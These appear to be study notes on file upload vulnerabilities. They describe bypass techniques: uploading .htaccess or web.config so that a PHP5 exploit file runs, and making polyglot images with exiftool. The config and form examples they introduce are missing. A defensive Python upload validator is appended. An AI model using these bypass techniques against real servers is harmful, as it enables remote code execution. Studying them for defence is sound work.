File upload vulnerabilities arise when a web server lets users upload files to its filesystem without sufficiently validating properties such as:
- Name
- Content
- Size
- Type
Leak in Content-Type response
The Content-Type response header may provide clues about what kind of file the server believes it has served. If the application code has not set this header explicitly, it typically reflects the result of the server's file extension to MIME type mapping.
Servers don't execute PHP files by default. There are multiple ways to enable the execution of PHP files depending on the server technology. For example, on an Apache server, to run PHP in every directory you need to add the following line to /etc/apache2/apache2.conf:
The server can also be configured to apply specific rules to individual folders. This is done in a .htaccess file with these lines:
Example of a manipulated form where I add an .htaccess file to run exploit.php5:
Example of directory-specific configuration on an IIS server, located in web.config:
Obfuscating
Intrinsic properties of files
JPG:
JPG files always begin with the bytes FF D8 FF.
Polyglot files
We can create polyglot files with tools like exiftool, which embed code inside a file that still validates as a different file type (for example, PHP code carried in an image's metadata), so a check on the file's intrinsic properties alone is not enough.
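As an added example (not code from the original notes), the following Python upload validator enforces the four properties listed at the top of the page: a strict filename allowlist that rejects .htaccess, web.config, path traversal and double extensions such as exploit.php.jpg; a size limit; agreement between the declared Content-Type and the extension; and the JPG magic bytes FF D8 FF. The allowed types, size limit and function names are assumptions for this example; the comments note why the magic-byte check does not stop a polyglot and what else is needed.

```python
import os
import re
import secrets

MAX_BYTES = 2 * 1024 * 1024  # constructed size limit for this example
# extension -> (MIME type the server will serve it as, leading magic bytes)
ALLOWED = {
    "jpg": ("image/jpeg", b"\xff\xd8\xff"),
    "jpeg": ("image/jpeg", b"\xff\xd8\xff"),
    "png": ("image/png", b"\x89PNG\r\n\x1a\n"),
}
# One dot only: rejects ".htaccess", "web.config"-style names outside the
# allowlist, and double extensions like "shell.php.jpg".
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.[a-z0-9]{1,5}$")


def validate_upload(filename, declared_type, data):
    """Return (ok, reason) for one uploaded file (name, declared type, bytes)."""
    base = os.path.basename(filename)
    if base != filename or not SAFE_NAME.match(base):
        return False, "bad filename"          # traversal, leading dot, extra dots
    ext = base.rsplit(".", 1)[1]
    if ext not in ALLOWED:
        return False, "extension not allowed"  # e.g. php, php5, phtml
    if len(data) > MAX_BYTES:
        return False, "too large"
    mime, magic = ALLOWED[ext]
    # Compare only the media type; ignore parameters such as "; charset=..."
    if declared_type.split(";")[0].strip().lower() != mime:
        return False, "Content-Type does not match extension"
    # Magic bytes catch a renamed script, but NOT a polyglot JPEG that carries
    # code in its metadata: the file must also be stored where nothing executes
    # it and ideally be re-encoded to strip metadata before serving.
    if not data.startswith(magic):
        return False, "content does not match extension"
    return True, "ok"


def storage_name(ext):
    """Server-generated name: the client's filename is never reused on disk."""
    return secrets.token_hex(16) + "." + ext


if __name__ == "__main__":
    jpg = b"\xff\xd8\xff\xe0" + b"\x00" * 16   # constructed JPEG-like header
    print(validate_upload("photo.jpg", "image/jpeg", jpg))
    print(validate_upload(".htaccess", "text/plain", b"AddType x"))
    print(validate_upload("exploit.php5", "image/jpeg", jpg))
```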